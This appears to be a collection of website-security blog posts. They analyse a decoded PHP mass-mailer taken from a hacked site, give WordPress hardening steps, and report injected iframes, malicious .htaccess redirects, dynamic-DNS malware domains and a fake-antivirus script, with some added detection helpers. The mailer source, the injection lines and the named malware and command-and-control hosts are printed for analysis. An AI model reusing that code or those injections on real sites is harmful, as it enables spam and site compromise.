PHP Spam tool (UnixStats Mass MaiLer)

While looking at a compromised site, we found an interesting mass mailer in there. The content was encoded using eval/gzinflate and base64_decode:

But after switching the “eval” for “print”, we could see the hidden mass mailer and what it was doing:

$secure = "racrewmania@googlemail.com";
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
..
<title>UnixStats Mass MaiLer</title>
..
for($xx=0; $xx<$amount; $xx++){
  for($x=0; $x<$numemails; $x++){
    $to = $allemails[$x];
    if ($to){
      $to = ereg_replace(" ", "", $to);
      $message = ereg_replace("&email&", $to, $message);
      $subject = ereg_replace("&email&", $to, $subject);
      print "Sending mail to $to.......";
      flush();
      $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
      $header .= "MIME-Version: 1.0\r\n";
      If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
      If ($file_name) $header .= "--$uid\r\n";
      $header .= "Content-Type: text/$contenttype\r\n";
      $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
      $header .= "$message\r\n";
      If ($file_name) $header .= "--$uid\r\n";
      If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
      If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
      If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
      If ($file_name) $header .= "$content\r\n";
      If ($file_name) $header .= "--$uid--";
      mail($to
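A static alternative to the eval-to-print swap described above, added here as an example (it is not code from the original post): it peels eval/gzinflate/base64_decode layers in Python without running any PHP, then checks the result for strings seen in the decoded mailer. The function names, the limits and the inert sample payload are assumptions constructed for illustration.

```python
import base64
import re
import zlib

# eval(gzinflate(base64_decode('...'))), tolerating @, whitespace and either quote style.
WRAPPER = re.compile(
    r"""@?eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(['"])"""
    r"""([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)\s*;?""",
    re.IGNORECASE,
)
MAX_LAYERS = 50               # the wrapper is often nested several times
MAX_OUTPUT = 5 * 1024 * 1024  # cap per-layer output to avoid decompression bombs

# Strings taken from the decoded mailer shown in the post.
INDICATORS = ("UnixStats Mass MaiLer", "$_POST['emaillist']", "set_time_limit(", "mail(")


def inflate_raw(data):
    """PHP gzinflate() takes a raw DEFLATE stream, hence wbits=-15."""
    d = zlib.decompressobj(-15)
    out = d.decompress(data, MAX_OUTPUT)
    if d.unconsumed_tail:
        raise ValueError("layer inflates past MAX_OUTPUT")
    return out


def unwrap(php_source):
    """Peel every eval/gzinflate/base64_decode layer; nothing is executed."""
    layers = 0
    while layers < MAX_LAYERS:
        m = WRAPPER.search(php_source)
        if m is None:
            break
        inner = inflate_raw(base64.b64decode(m.group(2)))
        php_source = (php_source[:m.start()]
                      + inner.decode("utf-8", errors="replace")
                      + php_source[m.end():])
        layers += 1
    return php_source, layers


def triage(decoded):
    """Return the indicator strings present in the decoded source."""
    return [s for s in INDICATORS if s in decoded]


def make_sample(inner_php, layers):
    """Build a constructed test file by wrapping harmless PHP `layers` times."""
    code = inner_php
    for _ in range(layers):
        c = zlib.compressobj(9, zlib.DEFLATED, -15)
        blob = base64.b64encode(c.compress(code.encode()) + c.flush()).decode()
        code = "eval(gzinflate(base64_decode('%s')));" % blob
    return "<?php " + code + " ?>"


if __name__ == "__main__":
    # Constructed, inert stand-in for the file found on the compromised site.
    stub = "$emaillist=$_POST['emaillist']; echo '<title>UnixStats Mass MaiLer</title>';"
    decoded, n = unwrap(make_sample(stub, 3))
    print(n, "layers removed")
    print(decoded)
    print("indicators:", triage(decoded))
```
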

WordPress and Server Hardening – Taking Security to Another Level

The biggest problem today with most content management systems (CMS) and web applications is the adoption of what we call the “Win95 security model”. Do you remember the Windows 95 security model? With everything running under the admin role? No separation of privileges? No separation of processes? One vulnerability and you take it all?

Confused as to how this relates to today’s CMSs (including WordPress, Joomla, and others)? Let us explain using WordPress as an example (the most popular CMS out there):

  1. The user that is running WordPress (including any plugin or theme) can modify any file on the site.
  2. Any URL can be accessed directly, even when they are not supposed to be used that way.
  3. The admin panel (wp-admin) runs in the same domain and within the same codebase/permissions as the rest of the application.
  4. Admin users can install any plugin/theme, which can then modify any file and change anything in the database.
  5. Most users log in as admin, even though they don’t need “admin” access most of the time.
  6. Every plugin and theme has the same level of access (and permissions) as the core of the application (no separation of privileges).

Yes, this is the default and most common way to install WordPress, specifically on shared hosts. Why, you ask? It is easy to install and configure, but that is not to be confused with the correct or secure approach to installing any application.

Imagine, it’s like having one username and password for all your accounts… oh… wait…

Improving Your Security Posture

I should preface this by saying that this won’t apply to shared environments, sorry… 🙁

But if you’re on a dedicated (or VPS) environment you’re in luck, so read on.

1- Correcting Server Access Control

The user running WordPress (generally www-data or apache) should not have permissions to modify any file.

That protects you in case there is a vulnerability in any plugin, theme (or even in WordPress itself), since they won’t be able to modify anything.

Fortunately, there is an easy fix, but one that many won’t use. In most instances WordPress is running as apache/apache, the default webserver user and group. What you want to do is create a new user that will assume that role, so that the webserver user no longer has those rights.

To do this, run the following:

# adduser wordpressuser
# cd /var/www/pathtoyoursite
# chown -R wordpressuser .
# chmod -R 750 .
# chgrp -R apache .

This makes wordpressuser the only user with write permissions to your site directory.

Now, we all know that the only directory that needs to be writeable is the uploads directory in WordPress. So, to accommodate this we make a slight modification that allows our beloved Apache user to write to that directory:

# chmod -R 770 ./wp-content/uploads/

Now, to ensure that we’re taking every precaution possible we turn to our .htaccess file to protect us from the injection of backdoors. You’ll want to create the .htaccess file inside the /wp-content/uploads directory:

php_flag engine off

and

<Files *.php>
deny from all
</Files>

InfoSec is about risk reduction. By taking these additional steps you have greatly reduced the inherent access control risk associated with default WordPress installations. Do note, however, that this is not isolated to WordPress; these steps can also be applied to Joomla, Drupal and other such CMS applications.
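To confirm that a site actually matches the model from this section (single owner, nothing group-writable outside uploads, no PHP and both .htaccess rules inside uploads), the following audit is added here as an example; it is not code from the original post. The function name `audit_site`, its parameters and the finding strings are hypothetical.

```python
import os
import stat

PHP_SUFFIXES = (".php", ".phtml")


def audit_site(root, owner_uid, uploads_rel="wp-content/uploads"):
    """Return sorted (relative_path, problem) pairs that break the model above."""
    root = os.path.abspath(root)
    uploads = os.path.normpath(os.path.join(root, uploads_rel))
    findings = []

    def in_uploads(path):
        return path == uploads or path.startswith(uploads + os.sep)

    for dirpath, _dirs, files in os.walk(root):
        for name in [""] + files:          # "" audits the directory itself
            path = os.path.join(dirpath, name) if name else dirpath
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue                   # link modes say nothing about the target
            rel = os.path.relpath(path, root)
            mode = stat.S_IMODE(st.st_mode)
            if st.st_uid != owner_uid:
                findings.append((rel, "not owned by the site user"))
            if mode & 0o007:
                findings.append((rel, "open to 'other' (expected 750/770)"))
            if mode & 0o020 and not in_uploads(path):
                findings.append((rel, "group-writable outside uploads"))
            if in_uploads(path) and name.lower().endswith(PHP_SUFFIXES):
                findings.append((rel, "PHP file inside uploads"))

    # The uploads .htaccess must carry both rules from the post.
    ht_rel = os.path.join(uploads_rel, ".htaccess")
    try:
        with open(os.path.join(root, ht_rel), errors="replace") as fh:
            rules = " ".join(fh.read().lower().split())
    except OSError:
        rules = ""
    if "php_flag engine off" not in rules:
        findings.append((ht_rel, "missing 'php_flag engine off'"))
    if "<files *.php>" not in rules or "deny from all" not in rules:
        findings.append((ht_rel, "missing <Files *.php> deny block"))
    return sorted(findings)


if __name__ == "__main__":
    import pwd
    import sys
    # Usage: audit.py /var/www/pathtoyoursite wordpressuser
    site, user = sys.argv[1], sys.argv[2]
    for rel, problem in audit_site(site, pwd.getpwnam(user).pw_uid):
        print("%-50s %s" % (rel, problem))
```
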

Disclaimer for my colleagues: Making this change will require you to take a more proactive approach to the administration of your site. You won’t be able to use the pretty GUIs WordPress offers you; you’ll have to manually update your core, themes, and plugins. But trust me, it’s OK, it’s only slightly inconvenient.

2- The Accessibility Challenge

WordPress has many files, but very few of them need to be accessed directly by the users. To prevent files being accessed directly, we recommend blocking direct PHP access to /wp-content with the following additions to your .htaccess file:

<Files *.php>
deny from all
</Files>

As an example of how this would have been useful, think back to the TimThumb outbreak last year or even this year’s Uploadify discussions. Killing the execution of PHP in /wp-content would have protected you, and will protect you, from both of these known vulnerabilities.

3- Correcting Application Access Control

The admin panel (wp-admin) runs on the same domain and same privileges as the rest of the application. In a perfect world, it would be isolated, but to minimize issues, we recommend adding two restrictions to wp-admin access (via .htaccess):

3.1- Only allowing certain IP addresses:

# deny everyone first, then let the listed addresses back in
order deny,allow
deny from all
allow from IP1
allow from IP2

3.2- Adding an additional user/pass (pre-authentication):

AuthUserFile /var/www/mysite/.htpasswd
AuthName "Site private access"
AuthType Basic
require user myuser2

By adding those two restrictions, you isolate wp-admin, requiring additional permissions and again, improve the security model. Hope you’re starting to get the trend of the post.

4- Restrict admin access to only required users

In the old days of Windows, everyone was admin. Don’t do the same on WordPress. If someone needs to write posts, they only need author permission. If someone needs to edit/post articles, they only need editor permission.

There is a reason that WordPress provides varying degrees of roles and associated permissions out of the box: use them. We realize they may be a bit complex and difficult to understand; hopefully this helps:

  • Administrator – can do everything
  • Editor – They write stuff, more importantly they can publish
  • Contributor – The Author’s cousin, but they can’t publish
  • Subscriber – They follow your rants about your favorite past times but can’t do anything else

Logging in as Admin for every task is foolish; don’t be that person.

Summarizing the journey

Above we addressed 4 steps that, if employed, cover 5 distinct sections of the security model I prefaced the post with:

  1. The user that is running WordPress (including any plugin or theme) can modify any file on the site
  2. Any URL can be accessed directly, even when they are not supposed to be used that way
  3. The admin panel (wp-admin) runs in the same domain and within the same codebase/permission as the rest of the application.
  4. Admin users can install any plugin/theme, which can then modify any file or change anything in the database
  5. Most users log in as admin, even though they don’t need “admin” access most of the time

By employing some (OK, all) of the recommendations above, you have effectively disabled WordPress from modifying its own files, admin users no longer have write permission to all files, and the themes/plugins can’t modify everything. Why are these three areas important? Well, because they are the most exploited vectors to date.

If you think this is all, you’re wrong. I would prefer to see updates where the plugins/themes no longer have the same level of permissions as the core of the application and their full database access (read/write) is removed, but I don’t want to give the appearance that I’m paranoid.

But seriously, in a perfect setup, you would have at least 2 database users: one configured on wp-admin with write access, and one for the rest of the site with only read access. I’m just saying..

Strange Malware from cdnexit.com

We are seeing thousands of sites compromised with an iframe from cdnexit.com:

This is the iframe that we detected:

http://cdn.cdnexit.com/Home/detect/index.php

Google has already flagged this domain and found it to be responsible for the infection of more than 1.5k sites:

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, cdnexit.com appeared to function as an intermediary for the infection of 1509 site(s) including txt.ir/, remedios-naturais.com/, pornupload.com/.

We can’t say for sure how sites got hacked, but we will post more details when we have them.

You know there is a vulnerability in Plesk when..

This is a simple way to know when a vulnerability in Plesk (or any other software) is being exploited in the wild:

When the mass scans for it start. The data is from ISC (isc.sans.org) and shows a massive increase in the number of queries for port 8443 (used by Plesk).

Top malware entry stats.php

Top malware entry for the day: poseyhumane.org/stats.php

<iframe src="http://poseyhumane.org/stats.php" name="Twitter"..
 scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

It seems to be the stats.php malware of the day. Related to our post here: Distributed Malware Network Outbreak Using Stats.php.

We also identified a CC (command and control server) for these infections: http://botstatisticupdate.com/stat/stat.php. More info to come soon.

Strange .htaccess redirections to google.com

A few weeks ago we reported the case of a few compromised sites with an .htaccess redirection to msn.com. Now we are seeing a few sites with the same redirection but to google.com.

This is what we are seeing on some hacked sites (.htaccess file):

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://google.com [R=301,L]

.. lots of empty lines/ white spaces ...
ErrorDocument 404 http://google.com

We have no idea why this is happening. Maybe it is a bug in the attacker’s malware injection code, but we can’t say for sure. We will post more details when we find out what is going on.
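The three traits of the .htaccess shown above (a Referer-conditional rewrite to another host, directives pushed out of view by blank lines, and an ErrorDocument pointing off-site) can be checked mechanically. The scanner below is added here as an example and is not from the original post; the function name, the `BLANK_RUN` threshold and both sample files are assumptions constructed for illustration.

```python
import re

REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s", re.I)
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
ERROR_DOC = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+(https?://\S+)", re.I)
EXTERNAL = re.compile(r"^https?://", re.I)
BLANK_RUN = 20  # assumption: this many consecutive blank lines counts as padding


def scan_htaccess(text):
    """Return [(line_number, finding)] for the patterns described in the post."""
    findings = []
    referer_cond = False   # a Referer condition is waiting for its RewriteRule
    blanks = 0
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            blanks += 1
            continue
        if blanks >= BLANK_RUN:
            findings.append((n, "content hidden after %d blank lines" % blanks))
        blanks = 0
        if line.lstrip().startswith("#"):
            continue
        if REFERER_COND.match(line):
            referer_cond = True
            continue
        rule = REWRITE_RULE.match(line)
        if rule:
            target = rule.group(1)
            # An absolute URL on another host is an external redirect, with or without [R].
            if referer_cond and EXTERNAL.match(target):
                findings.append((n, "referer-conditional redirect to " + target))
            referer_cond = False   # conditions only apply to the next rule
            continue
        doc = ERROR_DOC.match(line)
        if doc:
            findings.append((n, "ErrorDocument sends visitors to " + doc.group(1)))
    return findings


# Constructed sample modelled on the file in the post (referer list shortened,
# 40 blank lines standing in for "lots of empty lines").
INFECTED = "\n".join([
    "RewriteEngine On",
    r"RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|bing)\.(.*)",
    "RewriteRule ^(.*)$ http://google.com [R=301,L]",
] + [""] * 40 + ["ErrorDocument 404 http://google.com"])

# Constructed clean sample: the stock WordPress rewrite block.
CLEAN = "\n".join([
    "# BEGIN WordPress",
    "RewriteEngine On",
    "RewriteBase /",
    r"RewriteRule ^index\.php$ - [L]",
    "RewriteCond %{REQUEST_FILENAME} !-f",
    "RewriteCond %{REQUEST_FILENAME} !-d",
    "RewriteRule . /index.php [L]",
    "# END WordPress",
])

if __name__ == "__main__":
    for line_no, finding in scan_htaccess(INFECTED):
        print("line %d: %s" % (line_no, finding))
```
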

ChangeIP (dynamic DNS) malware

If you look at the top domains distributing malware over the last few days (and months), what do you see in common?

#numberofsitesinfected #type #malwaredomain
650 iframe  http://cvrtyi.ddns.info/nighttrend.cgi?8
315 iframe  http://byiegfs.ddns.info/nighttrend.cgi?8
275 iframe  http://ileshdg.qhigh.com/nighttrend.cgi?8
179 iframe  http://sdcmd.freewww.info/nighttrend.cgi?8
159 iframe  http://lmybv.ddns.name/nighttrend.cgi?8
148 iframe  http://wstckewb.freewww.biz/nighttrend.cgi?8
146 iframe  http://zqajsv.qhigh.com/nighttrend.cgi?8
126 iframe  http://avvof.sellClassics.com/nighttrend.cgi?8
116 iframe  http://wnevt.pcanywhere.net/nighttrend.cgi?8
101 iframe  http://acijwfr.freewww.info/nighttrend.cgi?8
93  iframe  http://cqcsk.ddns.name/facebook.cgi?8
84  iframe  http://thcolxbbt.qhigh.com/facebook.cgi?8
77  iframe  http://bwnzgtv.qhigh.com/facebook.cgi?8
74  iframe  http://anmvmhz.ddns.info/facebook.cgi?8
73  iframe  http://hbuwmx.myddns.com/facebook.cgi?8
72  iframe  http://qizkfd.mynumber.org/facebook.cgi?8

Most of them are using a ChangeIP.com (dynamic DNS) subdomain as the first level of injection. Just check ddns.info, qhigh.com, mynumber.org, pcanywhere.net, etc. They are all part of http://www.changeip.com/. Just in the last 60 days, we identified more than 15,000 different subdomains from them being used to distribute malware.

Don’t get us wrong, Dynamic DNS is a very useful service, but we would love it if they would implement more serious filtering/blacklisting and some type of captcha to prevent their service from being abused by criminals.

However, in the current state, we can only recommend against using their service, to avoid being thrown in the mix with the thousands of malicious domains that they host.

*If you look past 6 months ago, .co.cc was the main domain distributing malware, but since it was shut down, the attackers have migrated to changeip.com. Hopefully they will do something about it.

GCCanada.com Malware

We are seeing a large number of sites with a malscript from gccanada.com injected into them. The malware redirects visitors to searchmagnified.com, which redirects them to freeresultsguide.com. This is the code being added to the hacked sites:

script type=’text/javascript’ src=”http://gccanada[.]com/jquery[.]js

What is so bad about it? The final domain, ‘freeresultsguide.com’, pushes you to buy fake antivirus software with some annoying messages and warnings:

Important security message. Please call the number provided asap to get your computer fixed. You have a virus!

If you see this gccanada code on your site, it means you got hacked. It is not from the Government of Canada, as they want you to think.